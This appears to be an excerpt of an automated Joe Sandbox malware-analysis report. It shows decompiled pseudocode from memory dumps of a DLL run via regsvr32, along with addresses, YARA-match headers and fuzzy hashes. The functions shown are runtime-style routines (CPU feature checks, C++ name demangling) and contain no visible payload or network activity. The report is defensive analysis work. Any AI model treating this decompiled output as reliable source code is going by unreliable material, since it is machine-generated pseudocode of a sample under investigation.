                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t66 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t71;
                                                                      				E0000000118003AA20(_t57, __rcx, _t66, _t69, _t72, _t73, _t77);
                                                                      				goto 0x8001ae6a;
                                                                      				if ( *((intOrPtr*)(_t66 + 0x470)) != 1) goto 0x8001ae58;
                                                                      				_t43 =  *((intOrPtr*)(_t66 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t63 + 0x39));
                                                                      				_t70 = _t63 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t70 != 0) goto 0x8001ae14;
                                                                      				 *_t70 = 4;
                                                                      				 *((intOrPtr*)(_t70 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t70 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001ae6a;
                                                                      				_v24 = _t43;
                                                                      				r8d = 4;
                                                                      				if (E00000001180015A5C(_t41, _t63, _t63, _t70, _t71, _t78, _t79) != 0) goto 0x8001ae0c;
                                                                      				_t60 =  *((intOrPtr*)(_t63 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t63 + 8));
                                                                      				_v24 = _t71;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t63 + 8)), _t63, _t63, _t70, _t72, _t73, _t77);
                                                                      				goto 0x8001ae0f;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001ad70
                                                                      0x18001ad81
                                                                      0x18001ad84
                                                                      0x18001ad86
                                                                      0x18001ad8b
                                                                      0x18001ad8f
                                                                      0x18001ad94
                                                                      0x18001ada3
                                                                      0x18001ada5
                                                                      0x18001adab
                                                                      0x18001adae
                                                                      0x18001adb3
                                                                      0x18001adb7
                                                                      0x18001adbe
                                                                      0x18001adc4
                                                                      0x18001adc9
                                                                      0x18001adce
                                                                      0x18001add5
                                                                      0x18001ade5
                                                                      0x18001ade7
                                                                      0x18001adf1
                                                                      0x18001adf5
                                                                      0x18001adfd
                                                                      0x18001adff
                                                                      0x18001ae05
                                                                      0x18001ae09
                                                                      0x18001ae0c
                                                                      0x18001ae12
                                                                      0x18001ae14
                                                                      0x18001ae18
                                                                      0x18001ae28
                                                                      0x18001ae2a
                                                                      0x18001ae2e
                                                                      0x18001ae31
                                                                      0x18001ae38
                                                                      0x18001ae3c
                                                                      0x18001ae47
                                                                      0x18001ae4c
                                                                      0x18001ae51
                                                                      0x18001ae56
                                                                      0x18001ae60
                                                                      0x18001ae66
                                                                      0x18001ae74

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 952bf00afd02c9976abcb7c2430cf3b1301ae1e5d5e96320f873618fe2cd648f
                                                                      • Instruction ID: 18f59039274af8dfcc4eb6432fc792bd8e1904bbe13ac08c7debde50276f7cae
                                                                      • Opcode Fuzzy Hash: 952bf00afd02c9976abcb7c2430cf3b1301ae1e5d5e96320f873618fe2cd648f
                                                                      • Instruction Fuzzy Hash: 8A319172608A88C6EB62CF29D1403AD77A0E39EB8CF258115EB4D0B751DF36C556DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 43%
                                                                      			E0000000118001CF10(void* __eax, long long __rbx, long long __rcx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t41;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				long long _t63;
                                                                      				intOrPtr _t66;
                                                                      				void* _t69;
                                                                      				intOrPtr* _t70;
                                                                      				long long _t71;
                                                                      				void* _t72;
                                                                      				void* _t73;
                                                                      				void* _t77;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t63 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001cf39;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t66 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x8001d004;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001cf7a;
                                                                      				_t56 =  *((intOrPtr*)(_t66 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t66 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t71;
                                                                      				E0000000118003AA20(_t57, __rcx, _t66, _t69, _t72, _t73, _t77);
                                                                      				goto 0x8001d00a;
                                                                      				if ( *((intOrPtr*)(_t66 + 0x470)) != 1) goto 0x8001cff8;
                                                                      				_t43 =  *((intOrPtr*)(_t66 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t63 + 0x39));
                                                                      				_t70 = _t63 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t70 != 0) goto 0x8001cfb4;
                                                                      				 *_t70 = 4;
                                                                      				 *((intOrPtr*)(_t70 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t70 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001d00a;
                                                                      				_v24 = _t43;
                                                                      				r8d = 4;
                                                                      				if (E0000000118000E818(_t41, _t63, _t63, _t70, _t71, _t78, _t79) != 0) goto 0x8001cfac;
                                                                      				_t60 =  *((intOrPtr*)(_t63 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t63 + 8));
                                                                      				_v24 = _t71;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t63 + 8)), _t63, _t63, _t70, _t72, _t73, _t77);
                                                                      				goto 0x8001cfaf;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001cf10
                                                                      0x18001cf21
                                                                      0x18001cf24
                                                                      0x18001cf26
                                                                      0x18001cf2b
                                                                      0x18001cf2f
                                                                      0x18001cf34
                                                                      0x18001cf43
                                                                      0x18001cf45
                                                                      0x18001cf4b
                                                                      0x18001cf4e
                                                                      0x18001cf53
                                                                      0x18001cf57
                                                                      0x18001cf5e
                                                                      0x18001cf64
                                                                      0x18001cf69
                                                                      0x18001cf6e
                                                                      0x18001cf75
                                                                      0x18001cf85
                                                                      0x18001cf87
                                                                      0x18001cf91
                                                                      0x18001cf95
                                                                      0x18001cf9d
                                                                      0x18001cf9f
                                                                      0x18001cfa5
                                                                      0x18001cfa9
                                                                      0x18001cfac
                                                                      0x18001cfb2
                                                                      0x18001cfb4
                                                                      0x18001cfb8
                                                                      0x18001cfc8
                                                                      0x18001cfca
                                                                      0x18001cfce
                                                                      0x18001cfd1
                                                                      0x18001cfd8
                                                                      0x18001cfdc
                                                                      0x18001cfe7
                                                                      0x18001cfec
                                                                      0x18001cff1
                                                                      0x18001cff6
                                                                      0x18001d000
                                                                      0x18001d006
                                                                      0x18001d014

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 952bf00afd02c9976abcb7c2430cf3b1301ae1e5d5e96320f873618fe2cd648f
                                                                      • Instruction ID: fbe0349832dc676426ef25c70fe85b68f188d6ca886b6eb54801af1c9f4f48d1
                                                                      • Opcode Fuzzy Hash: 952bf00afd02c9976abcb7c2430cf3b1301ae1e5d5e96320f873618fe2cd648f
                                                                      • Instruction Fuzzy Hash: 5F31A272214A88C6EB66CF29D0407AD7BA1F39DB88F258129EB4D0B751CF36C597CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16c29b7352b613688215f6f20602e2a342d665c5b0a0406c99f77ef4ab156ca5
                                                                      • Instruction ID: 3c70ff7845b0d013df4024b663579686626db2ed51f2ddd2053c74b785eb97d0
                                                                      • Opcode Fuzzy Hash: 16c29b7352b613688215f6f20602e2a342d665c5b0a0406c99f77ef4ab156ca5
                                                                      • Instruction Fuzzy Hash: F731F3B090035E8BCF48CF64C88A4EE7FB0FB18358F50561DE85AA6250D3B886958FC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0665d65f8ee86cb5b8a8fa6302d7ea0c4540297a8bbfc5ae2158d3617e6da41e
                                                                      • Instruction ID: 32dfe5573702fda51d6e7d4070401247dee3854b98fda76b4248c28bcd47b2b3
                                                                      • Opcode Fuzzy Hash: 0665d65f8ee86cb5b8a8fa6302d7ea0c4540297a8bbfc5ae2158d3617e6da41e
                                                                      • Instruction Fuzzy Hash: 63218A705283858B8348DF28D19641ABBE1FB9C30CF504B2DF8CAE6250D778E645CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7f70f92bd3fdfcf6cddb859b3d47ef0fd1c5fdca06034c374bc7462f066249b
                                                                      • Instruction ID: c37c746c2396ad2f44161d93462f29171b737080fc61e0f10aacb189e7c2aec3
                                                                      • Opcode Fuzzy Hash: e7f70f92bd3fdfcf6cddb859b3d47ef0fd1c5fdca06034c374bc7462f066249b
                                                                      • Instruction Fuzzy Hash: 1C315BB45183858BC748DF28C04A41ABBE1FBCC708F405B1DF8CAAB250DB799645CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 761a0acd4aa7556e1f0b8e78b25de27883e7a07fdc542b8de1769ee4cf27c953
                                                                      • Instruction ID: 45f566f2fded5cd3e5d0045baa9ed24a4fe3630d9c5549dc7d68b180dafb9958
                                                                      • Opcode Fuzzy Hash: 761a0acd4aa7556e1f0b8e78b25de27883e7a07fdc542b8de1769ee4cf27c953
                                                                      • Instruction Fuzzy Hash: 22217F706187848B8748DF28C45641ABBE1FBCD308F404B2DF8CAA7361E738A645CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c543b3490ae627394bec3abf6e3d17f16f89ce6b70411a9ba6b50d03d606453
                                                                      • Instruction ID: 746a6ae06d9f94fbbcc39b7fbc431fec409294ec34a575f98dbb896551c8be77
                                                                      • Opcode Fuzzy Hash: 6c543b3490ae627394bec3abf6e3d17f16f89ce6b70411a9ba6b50d03d606453
                                                                      • Instruction Fuzzy Hash: A32149B45187848B8349EF28C44A51ABBE1FBCC70CF401B6DF4CAAB250D7789654CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a11d13e9175738640e63f486bf5778bad6bc02420d33aa3ac4306d5e4fa61aa5
                                                                      • Instruction ID: 4f4a34fe36c4726d894199be257b45dbb2cc5921b64e720b97a5a5ee29f772ec
                                                                      • Opcode Fuzzy Hash: a11d13e9175738640e63f486bf5778bad6bc02420d33aa3ac4306d5e4fa61aa5
                                                                      • Instruction Fuzzy Hash: D42168B452C381AFC389DF28D08981BBBF0FB99708F902A2DF8858B250D775D449CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00000001180045B10(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				void* _t25;
                                                                      
                                                                      				_t25 = __r8;
                                                                      				r8d = 0;
                                                                      				 *0x800741e8 = r8d;
                                                                      				_t1 = _t25 + 1; // 0x1
                                                                      				r9d = _t1;
                                                                      				asm("cpuid");
                                                                      				_v16 = r9d;
                                                                      				_v16 = 0;
                                                                      				_v20 = __ebx;
                                                                      				_v12 = __edx;
                                                                      				if (0 != 0x18001000) goto 0x80045b71;
                                                                      				asm("xgetbv");
                                                                      				_a8 = __rdx << 0x00000020 | __rax;
                                                                      				r8d =  *0x800741e8; // 0x1
                                                                      				r8d =  ==  ? r9d : r8d;
                                                                      				 *0x800741e8 = r8d;
                                                                      				 *0x800741ec = r8d;
                                                                      				return 0;
                                                                      			}







                                                                      0x180045b10
                                                                      0x180045b16
                                                                      0x180045b1b
                                                                      0x180045b22
                                                                      0x180045b22
                                                                      0x180045b29
                                                                      0x180045b2b
                                                                      0x180045b33
                                                                      0x180045b39
                                                                      0x180045b3d
                                                                      0x180045b43
                                                                      0x180045b47
                                                                      0x180045b51
                                                                      0x180045b5b
                                                                      0x180045b66
                                                                      0x180045b6a
                                                                      0x180045b71
                                                                      0x180045b7f

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81ebab7aef57633ab0c34f516b795792563252ddf2cf8d1c1bc5ca03e707bb24
                                                                      • Instruction ID: c0cd88a36f3bcb5316119d279376ce117bed34ca97aee9e938ec3dbb13d83c12
                                                                      • Opcode Fuzzy Hash: 81ebab7aef57633ab0c34f516b795792563252ddf2cf8d1c1bc5ca03e707bb24
                                                                      • Instruction Fuzzy Hash: 77F062767146A88BDBE5DF68A84275977D0E35C3C5F90C019EA8987F14D73D82A48F04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7eb3448c68eb2209f12455a1773cd7768a812da3efdaa160061589489b146f7e
                                                                      • Instruction ID: 83d4174a56719f4046576558e650fdeb944294971413432889f8573ab4b1fd47
                                                                      • Opcode Fuzzy Hash: 7eb3448c68eb2209f12455a1773cd7768a812da3efdaa160061589489b146f7e
                                                                      • Instruction Fuzzy Hash: 5CA00275104D08E0E6C7EB41EC617D03339F3683D4F508015F11A810A09F38868CC301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E00000001180033FA0(long long __rbx, long long* __rcx, void* __rdx, long long __rdi, long long __r14, long long __r15, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed int _v16;
                                                                      				signed int _v24;
                                                                      				signed char _v32;
                                                                      				char _v40;
                                                                      				signed int _v48;
                                                                      				signed int _v56;
                                                                      				signed int _t104;
                                                                      				void* _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t126;
                                                                      				signed int _t133;
                                                                      				signed int _t134;
                                                                      				signed int _t135;
                                                                      				void* _t138;
                                                                      				void* _t142;
                                                                      				signed char _t149;
                                                                      				signed char _t161;
                                                                      				void* _t164;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t170;
                                                                      				void* _t171;
                                                                      				signed int _t172;
                                                                      				void* _t173;
                                                                      				void* _t175;
                                                                      				signed int _t182;
                                                                      				void* _t191;
                                                                      				signed char* _t192;
                                                                      				signed char* _t194;
                                                                      				long long* _t196;
                                                                      				long long* _t209;
                                                                      				long long _t215;
                                                                      				long long* _t218;
                                                                      				signed long long* _t252;
                                                                      				long long* _t269;
                                                                      				void* _t271;
                                                                      				void* _t272;
                                                                      				void* _t275;
                                                                      				signed char* _t278;
                                                                      				signed char* _t280;
                                                                      				void* _t284;
                                                                      				void* _t285;
                                                                      				long long _t286;
                                                                      
                                                                      				_t286 = __r14;
                                                                      				_t191 = _t275;
                                                                      				 *((long long*)(_t191 + 8)) = __rbx;
                                                                      				 *((long long*)(_t191 + 0x10)) = __rdi;
                                                                      				 *((long long*)(_t191 + 0x18)) = __r14;
                                                                      				 *((long long*)(_t191 + 0x20)) = __r15;
                                                                      				_t192 =  *0x800738a8; // 0x0
                                                                      				_t208 = __rdx;
                                                                      				_t269 = __rcx;
                                                                      				r14d =  *_t192 & 0x000000ff;
                                                                      				if (r14b == 0) goto 0x80034512;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				_t7 =  &(_t192[1]); // 0x1
                                                                      				_t278 = _t7;
                                                                      				_v48 = _v48 & 0x00000000;
                                                                      				r15b = 0;
                                                                      				 *0x800738a8 = _t278;
                                                                      				_t126 = r14d;
                                                                      				_t164 = r14d - 0x58;
                                                                      				if (_t164 > 0) goto 0x8003410e;
                                                                      				if (_t164 == 0) goto 0x800340fc;
                                                                      				_t165 = _t126 - 0x4b;
                                                                      				if (_t165 > 0) goto 0x8003407a;
                                                                      				if (_t165 == 0) goto 0x80034032;
                                                                      				if (_t165 == 0) goto 0x80034068;
                                                                      				if (_t165 == 0) goto 0x80034068;
                                                                      				if (_t165 == 0) goto 0x80034068;
                                                                      				if (_t165 == 0) goto 0x80034056;
                                                                      				if (_t165 == 0) goto 0x80034056;
                                                                      				if (_t165 == 0) goto 0x80034044;
                                                                      				_t133 = _t126 - 0x3d;
                                                                      				if (_t165 == 0) goto 0x80034044;
                                                                      				_t166 = _t133 - 1;
                                                                      				if (_t166 != 0) goto 0x80034113;
                                                                      				r8d = 4;
                                                                      				goto 0x80034449;
                                                                      				r8d = 3;
                                                                      				goto 0x80034449;
                                                                      				r8d = 5;
                                                                      				goto 0x80034449;
                                                                      				r8d = 4;
                                                                      				goto 0x80034449;
                                                                      				if (_t166 == 0) goto 0x800340ea;
                                                                      				if (_t166 == 0) goto 0x800340bd;
                                                                      				if (_t166 == 0) goto 0x800340a7;
                                                                      				if (_t166 == 0) goto 0x8003409f;
                                                                      				if (_t166 == 0) goto 0x8003409f;
                                                                      				if (_t166 == 0) goto 0x8003409f;
                                                                      				if (_t133 - 0x48 != 1) goto 0x80034113;
                                                                      				_t134 = _t133 & 0x00000003;
                                                                      				goto 0x800342cc;
                                                                      				r8d = 5;
                                                                      				E0000000118003668C(_t134, _t192, __rdx,  &_v56, "long ", __rcx, _t271);
                                                                      				_v16 = 6;
                                                                      				_v24 = "double";
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E0000000118002EAA8("double", __rdx,  &_v56,  &_v24);
                                                                      				goto 0x80034452;
                                                                      				r8d = 5;
                                                                      				goto 0x80034449;
                                                                      				r8d = 4;
                                                                      				goto 0x80034449;
                                                                      				if (_t134 == 0x5f) goto 0x80034148;
                                                                      				_t15 = _t278 - 1; // 0x0
                                                                      				_t194 = _t15;
                                                                      				 *0x800738a8 = _t194;
                                                                      				E00000001180034550(_t122, _t134, _t133 - 0x48, _t208,  &_v24, _t269, _t271, _t278, _t284, _t285, __r14);
                                                                      				_t215 =  *_t194;
                                                                      				_t161 = _t194[8];
                                                                      				_v56 = _t215;
                                                                      				_v48 = _t161;
                                                                      				if (_t215 != 0) goto 0x80034452;
                                                                      				 *_t269 = _t215;
                                                                      				 *(_t269 + 8) = _t161;
                                                                      				goto 0x80034530;
                                                                      				r15d =  *_t278 & 0x000000ff;
                                                                      				_t21 =  &(_t278[1]); // 0x2
                                                                      				 *0x800738a8 = _t21;
                                                                      				_t135 = r15d;
                                                                      				_t170 = r15d - 0x4d;
                                                                      				if (_t170 > 0) goto 0x80034263;
                                                                      				if (_t170 == 0) goto 0x8003422d;
                                                                      				_t171 = _t135 - 0x47;
                                                                      				if (_t171 > 0) goto 0x80034210;
                                                                      				if (_t171 == 0) goto 0x80034192;
                                                                      				_t172 = r15b;
                                                                      				if (_t172 == 0) goto 0x800341f2;
                                                                      				if (_t172 == 0) goto 0x800341b6;
                                                                      				if (_t172 == 0) goto 0x800341a4;
                                                                      				_t138 = _t135 - 3;
                                                                      				if (_t172 == 0) goto 0x800341a4;
                                                                      				_t173 = _t138 - 1;
                                                                      				if (_t173 != 0) goto 0x80034403;
                                                                      				r8d = 7;
                                                                      				goto 0x80034449;
                                                                      				r8d = 6;
                                                                      				goto 0x80034449;
                                                                      				_t196 = "__w64 ";
                                                                      				_v16 = 6;
                                                                      				_v24 = _t196;
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E00000001180033FA0(_t208,  &_v40, "__int8", _t269, __r14, __r15);
                                                                      				_t209 = _t196;
                                                                      				E0000000118002E4E4( &_v56,  &_v24);
                                                                      				_t218 = _t196;
                                                                      				goto 0x80034525;
                                                                      				 *0x800738a8 = _t278;
                                                                      				_v56 = 0x8005fee0;
                                                                      				_v48 = 1;
                                                                      				goto 0x80034452;
                                                                      				if (_t173 == 0) goto 0x80034251;
                                                                      				if (_t173 == 0) goto 0x80034251;
                                                                      				if (_t173 == 0) goto 0x8003423f;
                                                                      				_t142 = _t138 - 0x45;
                                                                      				if (_t173 == 0) goto 0x8003423f;
                                                                      				if (_t142 != 1) goto 0x80034403;
                                                                      				r8d = 8;
                                                                      				goto 0x80034449;
                                                                      				r8d = 7;
                                                                      				goto 0x80034449;
                                                                      				r8d = 7;
                                                                      				goto 0x80034449;
                                                                      				_t175 = _t142 - 0x53;
                                                                      				if (_t175 > 0) goto 0x800343ea;
                                                                      				if (_t175 == 0) goto 0x800343db;
                                                                      				if (_t175 == 0) goto 0x800343cc;
                                                                      				if (_t175 == 0) goto 0x800342c7;
                                                                      				if (_t175 == 0) goto 0x800342b5;
                                                                      				if (_t175 == 0) goto 0x800342a3;
                                                                      				if (_t142 - 0x4b != 1) goto 0x80034403;
                                                                      				_t29 = _t218 + 8; // -73
                                                                      				r8d = _t29;
                                                                      				goto 0x80034449;
                                                                      				r8d = 7;
                                                                      				goto 0x80034449;
                                                                      				r8d = 4;
                                                                      				goto 0x80034449;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				_v48 = _v48 & 0x00000000;
                                                                      				_t104 =  *(_t209 + 8);
                                                                      				_v24 =  *_t209;
                                                                      				_v16 = _t104;
                                                                      				if (0xfffffffe != 0xfffffffe) goto 0x80034346;
                                                                      				r9d = 0;
                                                                      				_v16 = _t104 | 0x00000800;
                                                                      				E00000001180034730(_t209,  &_v40,  &_v56, _t269, _t271,  &_v24, _t272);
                                                                      				if ((0x00000800 & _v32) != 0) goto 0x80034337;
                                                                      				_v16 = 2;
                                                                      				_v24 = 0x80066548;
                                                                      				_t252 =  &_v24;
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E0000000118002EAA8(0x80066548, _t209,  &_v40, _t252);
                                                                      				_t149 = _v32;
                                                                      				 *_t269 = _v40;
                                                                      				 *(_t269 + 8) = _t149;
                                                                      				goto 0x80034530;
                                                                      				if (_t252 != 0) goto 0x800343b1;
                                                                      				_t125 = _t149 & 0x00000002;
                                                                      				if ((_t149 & 0x00000001) == 0) goto 0x80034397;
                                                                      				_t53 = _t252 + 5; // 0x5
                                                                      				r8d = _t53;
                                                                      				E0000000118003668C(_t149, _v40, _t209,  &_v56, "const", _t269, _t271);
                                                                      				if (_t125 == 0) goto 0x800343b1;
                                                                      				_v32 = 9;
                                                                      				_v40 = " volatile";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002EAA8(" volatile", _t209,  &_v56,  &_v40);
                                                                      				goto 0x800343b1;
